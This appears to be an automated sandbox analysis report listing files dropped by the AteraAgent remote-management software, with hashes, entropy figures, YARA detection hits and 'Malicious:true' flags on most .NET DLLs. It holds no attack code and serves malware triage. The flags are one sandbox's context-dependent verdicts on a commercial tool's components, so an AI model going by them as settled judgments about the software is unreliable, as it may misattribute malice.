                                                                                                                                                                                                                                                                                              MD5:810F893E58861909B134FA72E3BC90CD
                                                                                                                                                                                                                                                                                              SHA1:524977F32836634132D23997B23304574D8D156A
                                                                                                                                                                                                                                                                                              SHA-256:B83B6C1F64B6700D7444586A6214858A1479C58571F5E7BF4F023166C9016733
                                                                                                                                                                                                                                                                                              SHA-512:DB463D34A37403A9248D463AE63989B40A0172D9543BDA922DACB10A624EB603700628A67D9C86DF2605C36D789902EC79228AA29F26C49BE0195C54A9E4A191
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1459
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.033662307409642
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dErdGPF7Nv+13vH2/nVhOXrRH2/d9XF7N0PH2/+w39XF7NQ7uH2/F9y:cErU7h+1/gn27Rgdz7Eg+w3z76agFw
                                                                                                                                                                                                                                                                                              MD5:C6ECF24757926EBA64E674BFF8B747D1
                                                                                                                                                                                                                                                                                              SHA1:3A46083826C20E8E085C42BBFDFEEF4F9E2B90D9
                                                                                                                                                                                                                                                                                              SHA-256:C3EC04142C15B0A237E72CE1C3C85D19CD1231B9824F7A9854E7909A74B7BECC
                                                                                                                                                                                                                                                                                              SHA-512:EFABB9883ADB098A90115E8938C92B76BBB8D2EB5DE170ECFA205EE949A2D722E0F97F6E01F9A71AC8B5FA2108B9FF82FA0171759D50E30D0AB5FC1948BDCE15
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhWan:WD
                                                                                                                                                                                                                                                                                              MD5:A6BD887EE94E12D3C42A5D47B4C73826
                                                                                                                                                                                                                                                                                              SHA1:6B30541A5B528FF8A8BEFDB5CAB0B9DCCF4B2491
                                                                                                                                                                                                                                                                                              SHA-256:643D32F1B400E5CDC5B76067EAC006167C07B321D5ABD06B30F1A45E9FE2253C
                                                                                                                                                                                                                                                                                              SHA-512:EC86B4BEDA8995C13F550CE0F1C60B7BF384F706D37C516A12C6E6D6E0040BC11F72E9AF09117D78B46BB799E9E41F4F6B2E78B84C2CF087AC76A1EB94986171
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=38.1
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):102440
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190271548489902
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:jPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OLv476/:j2bYbYSWd85I5sSakFQhHLv4k
                                                                                                                                                                                                                                                                                              MD5:04574008839C988B1598DF22015A4285
                                                                                                                                                                                                                                                                                              SHA1:9176EE5F15BF855F1A0ED1CAD5F1C33E29841D01
                                                                                                                                                                                                                                                                                              SHA-256:6347791BE389BF6BF83F6A499077CFC874E282B6515B7400F09950C35AE4A5B0
                                                                                                                                                                                                                                                                                              SHA-512:D21C39CA74C2DF27F0969A8E61A0A4B055B9765A3A87E34D05AC17570FC9CC7FB149034FA35F0F7F06231C116E4B61A88372ACD0704A68634E2E35E38797994D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95272
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.995771579764986
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:x4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkjUB766B:x4auS7S5Ea6WMcpuUB/
                                                                                                                                                                                                                                                                                              MD5:D132E136DB67781D6B7A78531B0890CC
                                                                                                                                                                                                                                                                                              SHA1:9E3CE11B6F880B50338768B88F4E9ACC1BB98EE5
                                                                                                                                                                                                                                                                                              SHA-256:01243BC9656F0F1F49A5A03807A8688408FE8685577351C8FC83A8251AC2603A
                                                                                                                                                                                                                                                                                              SHA-512:9260472A987BDCEAF5AD26B7164D729558EAE606DB80005AF77F576BB05DA350762CF93B92484BEE4607F7AED853308C49C7BB6AB70D6B0D1E9B30549F4951D9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):75304
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.240181778832263
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:8u2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYn:hF+qo7mDEwj4NXLGcfgruFcaD76ji
                                                                                                                                                                                                                                                                                              MD5:1730F5BE3A1F7BDDC6FA6C2C30F9A507
                                                                                                                                                                                                                                                                                              SHA1:5F96A22803ED258D8174650F872A926F16D9F0E8
                                                                                                                                                                                                                                                                                              SHA-256:F300A241B3E7EF97D43ECA324260E2859F3832C386B4D28B97979FC1FDF32218
                                                                                                                                                                                                                                                                                              SHA-512:19AC925A83EDF979BAE65A2BEF7FCC361535168D761C1D7350094501C149D4C3E21F5BF09652990879887553E6FE282F0B7AE5167CFFA208825244462633AE3B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.40663982427702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:uQMnMYPWMXMwtKsSdj3xn91SPSvwzE8Kku6P3A+wf+bnYEpYi60k4jvB:u9MYPJS/16/E8/3A+++bnh76J4jJ
                                                                                                                                                                                                                                                                                              MD5:6FA53D86A203A8F423D5D7031787D033
                                                                                                                                                                                                                                                                                              SHA1:8C30AFC2B99C8B3DE4FE734AB7AE1755A323B354
                                                                                                                                                                                                                                                                                              SHA-256:11939A9A964A1797C037931B39EBBE608FB9EEEED56DFF5D2429BE81B9395E18
                                                                                                                                                                                                                                                                                              SHA-512:0E0E21777A8AC07CD53A6B6674495DF85723C07B99E43D4DA017D6332A114F54B540EEF0861A495DFB102BB201D4F3D7215A79D197D5F46ADBD75C1025F791A5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):155176
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.246702749443142
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:60feG0EI+t80zE04kjSnY2QJ6lwZaBsEFmWF+YL4T:TP80zukOltwW2
                                                                                                                                                                                                                                                                                              MD5:9DDEEDCF39F32C55A41DD12DC8961631
                                                                                                                                                                                                                                                                                              SHA1:317A6834BC2B7A6E3766C1B655888BDF0C7B8308
                                                                                                                                                                                                                                                                                              SHA-256:775815C4993544294E44EA83B3C242D72E9E99F7D23AF880C02F4FFE4B74BD56
                                                                                                                                                                                                                                                                                              SHA-512:CC685F7F960113573345FC2E7D1760F9B7A12ED76AC9017692D2AB867572F28281D593CA109F159A0C6AE5F0ACCC12C0F539AB1C5BD83CE9E2A3DA4769CDC70E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.0304720380518
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:q1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sB:VIzm6pOIgvr70
                                                                                                                                                                                                                                                                                              MD5:EC0868979015D516787FCAA7CA0E5F6E
                                                                                                                                                                                                                                                                                              SHA1:3672A54366D82CE28A5F3A25A6281072B45435E9
                                                                                                                                                                                                                                                                                              SHA-256:70B27423EA7A908015D4F8A40E67EF023C8CB422B1E782D90A105BF1981525EF
                                                                                                                                                                                                                                                                                              SHA-512:E05640786DE1E598A49092B2FCC243129717AE1746D894D2FFF0C54AAAFF12BB4204881373D007B69BFC16F91AACB0C5A29A0E79A6A816191CAA209CB420A66C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                              SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                              SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                              SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):354344
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.153318474143049
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:qr/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYl:qhpp9xxIBeXGfvYl
                                                                                                                                                                                                                                                                                              MD5:D423AF5708A85A62D9C2FA2008166E14
                                                                                                                                                                                                                                                                                              SHA1:FA577CBD52F659AACD9E0E06BB38E8ABC77F9120
                                                                                                                                                                                                                                                                                              SHA-256:96A33DBBC0285A0E60E26F72603785CFB3622A0F2018FECFD9DD4C6364D5CBBC
                                                                                                                                                                                                                                                                                              SHA-512:50136E9FB29EF225A5E1BEFA3600A0ED50712E1855EC82D31C69C46914C28A2670F0D04355C9E58397E1AFA486AB7D4FAEAA364B16E8799148C485CC59FCC03B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071426082550366
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:E1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQB:E1n1p9LdRN39aQZUqI
                                                                                                                                                                                                                                                                                              MD5:758E6813699EE2BC65A6B8AB9DB9878B
                                                                                                                                                                                                                                                                                              SHA1:59F0F0BDA3C83FDCFD11382D7FA7034D3E443403
                                                                                                                                                                                                                                                                                              SHA-256:347085922A13D2C2739ACB9635A46A401C5428E4244720D576317EC252723F92
                                                                                                                                                                                                                                                                                              SHA-512:EC67941EDE60CE6C9E7ADCFFE781D7280597DB5D5D9C1A35B34F9DAFC2B8320C4171FB6018DC5E8186E29A3705C5BB4BF733F61DD0B7332222EE25F669CD43F6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960246410031846
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:jBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU0:jBA/ZTvQD0XY0AJBSjRlXP36RMGB
                                                                                                                                                                                                                                                                                              MD5:1A5E0E8E52E3B61AC8E5A022E3C6458B
                                                                                                                                                                                                                                                                                              SHA1:4B8F323732FF25E88DAAE46D0D6CD61B90377E2C
                                                                                                                                                                                                                                                                                              SHA-256:618483C9308B8DF3DD5EE1965A7CBB419DEA32369E0636466DF7FA44AD449668
                                                                                                                                                                                                                                                                                              SHA-512:058F32E1847101A8EB2CDF1A1659214864C776BBE788236C576A94357E262616C755DFE614C2FDC9EE23C38C52E1A77F2EF80DF5B3FEAA954F98C9A2D48D6A4F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):293416
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.121265926720703
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:2dmT7N9hXNx16L/kakZieD2C6gVkRYKn6nUa9K+yw:2dc7N/WkQHr64w
                                                                                                                                                                                                                                                                                              MD5:3E5ECBD39476F63D84738E0E1C20E168
                                                                                                                                                                                                                                                                                              SHA1:BBD02BD728AC561DEC02CD22C3FF2CB88365BCEA
                                                                                                                                                                                                                                                                                              SHA-256:16A9D6DEE7B4A1100F50D76992D6C8D3846F64A04C1B944AA6C2EE59AD1291F6
                                                                                                                                                                                                                                                                                              SHA-512:9B87988DFC0C78FE2EB5F232E873D49C2F4A3A5F13CC1237CBC1EE16881462352DC0537D3478CE7FED4A43AE3F23FC3559D05A7BC4597B660F73A2A8DD736499
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):277032
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190377243156036
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:hSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRlS0:uuQlBAMW0BvltxZ6R
                                                                                                                                                                                                                                                                                              MD5:3BE6CB23581238117B1165B3C7A1E80B
                                                                                                                                                                                                                                                                                              SHA1:ED0AD7C0B685D2ABACEBAC4323CE8CDC5B8029AB
                                                                                                                                                                                                                                                                                              SHA-256:478BFDAD9699E288674A9921CB031DA4B07266FA0F3F43BACAC95184F5B269D5
                                                                                                                                                                                                                                                                                              SHA-512:319720F8DCD45435171CF797C733CF07253F663E8873E7A94B32E6C0D027A9933DE24EBEFF00089540CC98D3DBB2892C8EB53648C641E369A1219A7B8C28577F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284200
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.116831406251441
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:cZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHjv:qgo0WPVTXgL
                                                                                                                                                                                                                                                                                              MD5:ACFE625DD1F6644017E798111D264831
                                                                                                                                                                                                                                                                                              SHA1:B2C13E82682293BCE4463D3D2490D021EA0C0859
                                                                                                                                                                                                                                                                                              SHA-256:33F8EA1196916DCE0674793E125F89247AC54168425C5FBF0B4F298145F80BB5
                                                                                                                                                                                                                                                                                              SHA-512:C2EF0A0479705C99F72EF40B21A14075F98BFCD65569467D44B98DF1BCFA1898EC47957F182FCB8F03C80ED396486B06A01920315C1614CCD96CDB080DD8A9C8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.676097587903696
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:sy/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqADi:suhMaVmzDC6k0EpYi60h
                                                                                                                                                                                                                                                                                              MD5:53C97103B34DBD9384E4251F09EB01ED
                                                                                                                                                                                                                                                                                              SHA1:296A0C99DB385D0177102C23161F57E98CC72197
                                                                                                                                                                                                                                                                                              SHA-256:15F176972DEA11A4B76FF0C9FE669E82E3F3D55951FF1DF7BD39B233FFD029CB
                                                                                                                                                                                                                                                                                              SHA-512:611559389187FAF5CF0748B6947600723A14ED9A789B1A236528F41880FDCEB079D721ADA9F2991366544B0E213CD37B67230C3CD723297AC4C111786C890E6B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):409128
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.097979108391063
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:bPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc12:p6heZBJm333M89QAv
                                                                                                                                                                                                                                                                                              MD5:3858D32B6499A109CBB854E1D520B8C6
                                                                                                                                                                                                                                                                                              SHA1:58C3CE821E1099B74904DFD7B34A8D2AF493B5CA
                                                                                                                                                                                                                                                                                              SHA-256:4669C4AFC929FE5DF58B169EBC2463BAC83F867390918B2CA6C21198B3E1B1F8
                                                                                                                                                                                                                                                                                              SHA-512:35E6668F8DCFEFF07C265AA1751274FA4EAB3AEC5643EE526B62244F5662404CE487E7D72822820EDFCBDBA843DE5F406A37F1DE4294960C94B6EF8F153AF5B8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.234006910981014
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Qzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDuyEpYi60Wt:QzpjF0/t043e3vggr83jMYa/hCT76Lt
                                                                                                                                                                                                                                                                                              MD5:E5AA555797EE6B66234B12FFC66294CF
                                                                                                                                                                                                                                                                                              SHA1:8F8E00792BA4F560CEAA0AE921AAE35686BAA1A2
                                                                                                                                                                                                                                                                                              SHA-256:5683B28288592916552AE470507C7A7C9758BF90B6C444A32DA9DB9CB0EB09C2
                                                                                                                                                                                                                                                                                              SHA-512:C1F27291F806ACC3B7E1F3788DDE7759E73CB3BA46F8F69E665AC05ED9901D8EC6A9F32C333607F4A312BE21E934C6176ED37CFAA58CEBF07F7319F79BDB9595
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):138280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.178587040008723
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:xP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJH5:xh0qjC5RMOHO420kN1C
                                                                                                                                                                                                                                                                                              MD5:0297D137B4074D003828F8B32E0C8FA3
                                                                                                                                                                                                                                                                                              SHA1:361D49888CBC6AE53EA7A0BB9ACC794D0D7FB728
                                                                                                                                                                                                                                                                                              SHA-256:9FE2BB55D334023DCFC7925582D6A7B3A3635A0406D9F90FEADDEA8EF8CBEE48
                                                                                                                                                                                                                                                                                              SHA-512:AB474DE4267C014B4662DC71E540E0196EC1F6847B931B381C01750A81AA255EA2369BF3621C48C59E1CB8E912B91854AA190A38F9A79B8476EA1AA153FC339E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.671037715639926
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:yh06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeBo38:yy9gpEpYi60Ah
                                                                                                                                                                                                                                                                                              MD5:C10B5E1564AF42CEC775454CAB8F5A47
                                                                                                                                                                                                                                                                                              SHA1:E23F9E1F26B751C8A69AEAE1ADEFC671E50183D2
                                                                                                                                                                                                                                                                                              SHA-256:E64018A03E1EAC23F31A32B51AB3CB5FDE9F18BED54221BFE8437DA740AE1BF5
                                                                                                                                                                                                                                                                                              SHA-512:C83D522441521BC57A3B947534499C23BAFD5DD71220A0349DD140995E8B59254DE15823B10B975347563807854441E23DEADF2B3367241893AE0FD77C35A092
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27176
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332608170737532
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:6n1VM0JrpNWDcIh6leOiDFIFBYp1+yWEpYi60V:6nvXYcIh6yFIFBYpcyX76s
                                                                                                                                                                                                                                                                                              MD5:E6EC9F19869FF3DA53F003667220A4E8
                                                                                                                                                                                                                                                                                              SHA1:2D95B5DC4EC0013D1A8CF04EA9BC54789DC5435E
                                                                                                                                                                                                                                                                                              SHA-256:AA2C8CA7B15429B23943B459A0970D5E9BCB73BAC98886B22E924DD00BD48267
